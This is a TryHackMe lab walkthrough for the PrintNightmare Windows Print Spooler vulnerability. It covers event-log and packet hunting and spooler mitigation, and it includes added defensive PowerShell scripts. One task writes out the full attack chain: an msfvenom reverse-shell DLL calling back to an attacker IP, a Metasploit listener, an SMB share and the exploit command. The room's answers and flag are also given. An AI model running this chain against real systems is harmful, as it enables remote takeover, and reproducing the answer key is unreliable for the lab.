Print Nightmare Walkthrough [TryHackMe]

Published 2023/11/09

Print Nightmare

Room URL
https://tryhackme.com/room/printnightmarehpzqlp8

What is Print Nightmare?

CVE-2021-34527, or PrintNightmare, is a vulnerability in the Windows Print Spooler that allows for a low priv user to escalate to administrator on a local box or on a remote server.
(https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)

Task 2

Where would you enable or disable Print Spooler Service?

Answer: Services

Task 3

Provide the CVE of the Windows Print Spooler Remote Code Execution Vulnerability that doesn't require local access to the machine.

Answer: CVE-2021-34527

What date was the CVE assigned for the vulnerability in the previous question?

Answer: 07/02/2021

Task 4

What is the flag residing on the Administrator's Desktop?

Answer: THM{SiGBQPMkSvejvmQNEL}

Impacket and pyasn1 were already installed (pyasn1 version > 0.4.2 is required).

$ pip list | grep impacket
$ pip list | grep pyasn1

Clone the git repository.

$ git clone https://github.com/tryhackme/CVE-2021-1675.git

Create a malicious DLL.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.18.58.92 LPORT=4444 -f dll -o malicious.dll

Listen on port 4444 using Metasploit.

$ msfconsole
> use exploit/multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> set lhost 10.18.58.92
> run -j 

Share kali directory using smbserver.py.

$ python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . -smb2support

Verify if the attack is feasible.

$ /usr/share/doc/python3-impacket/examples/rpcdump.py @10.10.24.145 | egrep 'MS-RPRN|MS-PAR'
sh: 0: getcwd() failed: No such file or directory
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Execute the exploit!

$ cd CVE-2021-1675
$ python CVE-2021-1675.py Finance-01.THMdepartment.local/sjohnston:mindheartbeauty76@10.10.24.145 '\\10.18.58.92\kali\malicious.dll'

Download the DLL via SMB and establish a connection with Metasploit.

Task 5

Provide the first folder path where you would likely find the dropped DLL payload.

Answer: C:\Windows\System32\spool\drivers\x64\3\

Considering the usage of the pcAddPrinterDriverEx() function, you will mostly find the malicious DLL dropped into the %WINDIR%\system32\spool\drivers\x64\3\ folder, along with DLLs that were loaded afterward from

Provide the function that is used to install printer drivers.

Answer: pcAddPrinterDriverEx()

The pcAddPrinterDriverEx() function is used to install a printer driver on the system.
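The folder named above is the legitimate x64 driver store, so a dropped payload sits next to real printer driver DLLs. The following PowerShell function is an added example (not from the TryHackMe room or the original post) that audits that directory tree from the defender's side, flagging DLLs that were created recently or do not carry a valid Authenticode signature. The seven-day window, the output fields and the assumption that it runs as an administrator on the examined host are choices made here.

```powershell
function Get-SuspiciousSpoolerDlls {
    [CmdletBinding()]
    param(
        # Only DLLs created after this point are reported as "new" (assumed window).
        [datetime]$Since = (Get-Date).AddDays(-7),
        # %WINDIR%\System32\spool\drivers\x64\3\ is the x64 driver store the room points at;
        # -Recurse also covers subfolders such as "New" that appear in the event logs.
        [string]$DriverRoot = (Join-Path $env:WINDIR 'System32\spool\drivers\x64\3')
    )

    if (-not (Test-Path -Path $DriverRoot)) {
        Write-Verbose "Driver store not found: $DriverRoot"
        return
    }

    Get-ChildItem -Path $DriverRoot -Filter '*.dll' -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Legitimate printer driver DLLs are normally signed; a dropped payload usually is not.
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }

            [pscustomobject]@{
                Path       = $_.FullName
                CreatedUtc = $_.CreationTimeUtc
                Signature  = $sig.Status        # Valid, NotSigned, HashMismatch, UnknownError, ...
                Signer     = $signer
                Sha256     = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            }
        } |
        # Keep anything that is new inside the window OR lacks a valid signature.
        Where-Object { $_.CreatedUtc -ge $Since -or $_.Signature -ne 'Valid' } |
        Sort-Object -Property CreatedUtc -Descending
}

# Usage: list candidates on the local host; the SHA256 column can be compared against
# the hash of a DLL recovered from a capture or a share.
Get-SuspiciousSpoolerDlls | Format-Table -AutoSize
```

An unsigned DLL in this tree is not proof on its own (some vendor drivers ship unsigned helper libraries), which is why the creation time and hash are returned together, so the result can be correlated with the PrintService and Sysmon events covered in the next task.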

What tool can the attacker use to scan for vulnerable print servers?

Answer: rpcdump.py

root@attackbox:~/Desktop/pn# rpcdump.py @10.10.109.79 | egrep 'MS-RPRN|MS-PAR' 
Protocol: [MS-RPRN]: Print System Remote Protocol 
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

Task 6

Provide the name of the dropped DLL, including the error code.

Answer: svch0st.dll,0x45A

Open Event Viewer.
Look under Applications and Services Logs > Microsoft > Windows > PrintService > Admin.

Provide the event log name and the event ID that detected the dropped DLL.

Answer: Microsoft-Windows-PrintService/Admin,808

Find the source name and the event ID when the Print Spooler Service stopped unexpectedly and how many times was this event logged?

Answer: Service Control Manager,7031,1

Windows Logs > System
Filter Current Log
event id: 7031

After some threat hunting steps, you are more confident now that it's a PrintNightmare attack. Hunt for the attacker's shell connection. Provide the log name, event ID, and destination port.

Answer: Microsoft-Windows-Sysmon/Operational,3,4747

Applications and Services Logs > Microsoft > Windows > Sysmon > Operational
Filter Current Log
event id: 3
Check the logs around the time of the attack at approximately 10:33 AM on 8/13/2021.

Oh no! You think you've found the attacker's connection. You need to know the attacker's IP address and the destination hostname in order to terminate the connection. Provide the attacker's IP address and the hostname.

Answer: 10.10.210.100,ip-10-10-210-100.eu-west-1.compute.internal

A Sysmon FileCreated event was generated and logged. Provide the full path to the dropped DLL and the earliest creation time in UTC.

Answer: C:\Windows\System32\spool\drivers\x64\3\New\svch0st.dll,2021-08-13 17-33-37

Filter Current Log
event id: 11
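The four Event Viewer lookups in this task (PrintService/Admin 808, Service Control Manager 7031, Sysmon 3 and Sysmon 11) can be pulled together in one pass with Get-WinEvent. The function below is an added example, not part of the room or the original post: it queries each log for the event IDs used above and returns the fields needed to answer the questions (dropped DLL path, destination IP, hostname and port). It assumes Sysmon is installed with its default channel name, that the spooler process is spoolsv.exe, and that it runs with permission to read the logs; the 24-hour default window is a choice made here.

```powershell
function Get-PrintNightmareEvents {
    [CmdletBinding()]
    param(
        # Look back this far; the room's events are around 2021-08-13 17:33 UTC.
        [datetime]$Since = (Get-Date).AddDays(-1)
    )

    # Helper: flatten Sysmon's <EventData><Data Name="...">value</Data> into a hashtable.
    function ConvertFrom-EventData($event) {
        $xml = [xml]$event.ToXml()
        $fields = @{}
        foreach ($node in $xml.Event.EventData.Data) { $fields[$node.Name] = $node.'#text' }
        return $fields
    }

    $results = @()

    # 1. PrintService/Admin 808: the spooler failed to load a plug-in module (the dropped DLL).
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PrintService/Admin'; Id = 808; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $results += [pscustomobject]@{
                TimeUtc = $_.TimeCreated.ToUniversalTime(); Log = 'PrintService/Admin'; Id = 808
                Detail  = ($_.Message -split "`n")[0]   # first line names the module and error code
            }
        }

    # 2. System 7031 from Service Control Manager: a service terminated unexpectedly.
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7031; StartTime = $Since } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Print Spooler' } |
        ForEach-Object {
            $results += [pscustomobject]@{
                TimeUtc = $_.TimeCreated.ToUniversalTime(); Log = 'System'; Id = 7031
                Detail  = 'Print Spooler terminated unexpectedly'
            }
        }

    # 3. Sysmon 3 (network connection) and 11 (file create) tied to the spooler.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 3, 11; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $f = ConvertFrom-EventData $_
            if ($_.Id -eq 3 -and $f['Image'] -like '*\spoolsv.exe') {
                # The spooler has no business opening outbound TCP sessions on its own.
                $results += [pscustomobject]@{
                    TimeUtc = $_.TimeCreated.ToUniversalTime(); Log = 'Sysmon/Operational'; Id = 3
                    Detail  = "spoolsv.exe -> $($f['DestinationIp']):$($f['DestinationPort']) ($($f['DestinationHostname']))"
                }
            }
            elseif ($_.Id -eq 11 -and $f['TargetFilename'] -like '*\spool\drivers\*.dll') {
                $results += [pscustomobject]@{
                    TimeUtc = $_.TimeCreated.ToUniversalTime(); Log = 'Sysmon/Operational'; Id = 11
                    Detail  = "FileCreate $($f['TargetFilename']) by $($f['Image'])"
                }
            }
        }

    $results | Sort-Object -Property TimeUtc
}

# Usage: show the timeline, oldest first, so the DLL drop (11), load failure (808),
# crash (7031) and callback (3) can be read in order.
Get-PrintNightmareEvents | Format-Table -AutoSize -Wrap
```

Reading the output in time order reproduces the hunting sequence of this task: the Sysmon 11 FileCreate under spool\drivers comes first, the 808 load failure names the same DLL, the 7031 records the resulting spooler crash, and a Sysmon 3 from spoolsv.exe to a non-printer destination is the shell callback.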

Task 7

First change the time display format so timestamps line up with the UTC values from the event logs:

View > Time Display Format > UTC Time of Day

Then open Statistics > Protocol Hierarchy. SMB is in use.

Since PrintNightmare involved transferring tools via SMB in Task 4, let's take a look at the SMB traffic first.

What is the host name of the domain controller?

Answer: WIN-1O0UJBNP9G7

What is the local domain?

Answer: printnightmare.local

What user account was utilized to exploit the vulnerability?

Answer: lowprivlarry

What was the malicious DLL used in the exploit?

Answer: letmein.dll

What was the attacker's IP address?

Answer: 10.10.124.236


It can be inferred that a DLL was shared via SMB.

What was the UNC path where the malicious DLL was hosted?

Answer: \\10.10.124.236\sharez

There are encrypted packets in the results. What was the associated protocol?

Answer: SMB3

Task 8

Provide two ways to manually disable the Print Spooler Service.

Answer: PowerShell,Group Policy

Where can you disable the Print Spooler Service in Group Policy?

Answer: Computer Configuration / Administrative Templates / Printers

Provide the command in PowerShell to detect if Print Spooler Service is enabled and running.

Answer: Get-Service -Name Spooler
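Get-Service -Name Spooler reports the current state but not the startup type, and it says nothing about whether the Group Policy setting from the previous question is applied. The script below is an added example (not from the room or the original post) that combines the three checks into one report and, separately, performs the manual PowerShell disable on hosts that do not need to print. The policy "Allow Print Spooler to accept client connections" under Computer Configuration / Administrative Templates / Printers is stored in the registry value named in the comment; that mapping is from my knowledge of Microsoft's PrintNightmare guidance, not from the page.

```powershell
function Test-PrintSpoolerExposure {
    # Service state (what Get-Service -Name Spooler shows in the room).
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if (-not $svc) {
        return [pscustomobject]@{ Present = $false; Status = $null; StartMode = $null; RemotePolicy = $null; Exposed = $false }
    }

    # Startup type comes from WMI/CIM; Get-Service alone does not expose it on older PowerShell.
    $cim = Get-CimInstance -ClassName Win32_Service -Filter "Name='Spooler'"

    # Group Policy: Computer Configuration / Administrative Templates / Printers /
    # "Allow Print Spooler to accept client connections". When configured it is written to
    # HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RegisterSpoolerRemoteRpcEndPoint
    # (1 = enabled, 2 = disabled). Absent value = not configured, which behaves as enabled.
    $pol = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers' `
                            -Name RegisterSpoolerRemoteRpcEndPoint -ErrorAction SilentlyContinue
    $remotePolicy = if ($pol) { $pol.RegisterSpoolerRemoteRpcEndPoint } else { 'NotConfigured' }

    [pscustomobject]@{
        Present      = $true
        Status       = $svc.Status          # Running / Stopped
        StartMode    = $cim.StartMode       # Auto / Manual / Disabled
        RemotePolicy = $remotePolicy
        # Exposed to remote driver installation only if the spooler runs AND remote RPC is not disabled.
        Exposed      = ($svc.Status -eq 'Running') -and ($remotePolicy -ne 2)
    }
}

function Disable-PrintSpooler {
    # Manual PowerShell mitigation for hosts that never print (servers, domain controllers).
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    if ($PSCmdlet.ShouldProcess('Spooler', 'Stop service and set startup type to Disabled')) {
        Stop-Service -Name Spooler -Force
        Set-Service  -Name Spooler -StartupType Disabled
    }
}

# Usage: report first; disable only where the report shows exposure and printing is not required.
$report = Test-PrintSpoolerExposure
$report | Format-List
if ($report.Exposed) {
    Disable-PrintSpooler -WhatIf   # drop -WhatIf to apply
}
```

Stopping the service without also setting the startup type to Disabled is not enough, since the spooler starts again at the next reboot; the policy-based option keeps local printing working while refusing the remote RPC calls the exploit depends on, which is why the report shows both.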

Thanks for reading!

Ref

Microsoft | Windows Print Spooler Remote Code Execution Vulnerability
0xdf hacks stuff | Playing with PrintNightmare
Medium | Understanding PrintNightmare Vulnerability
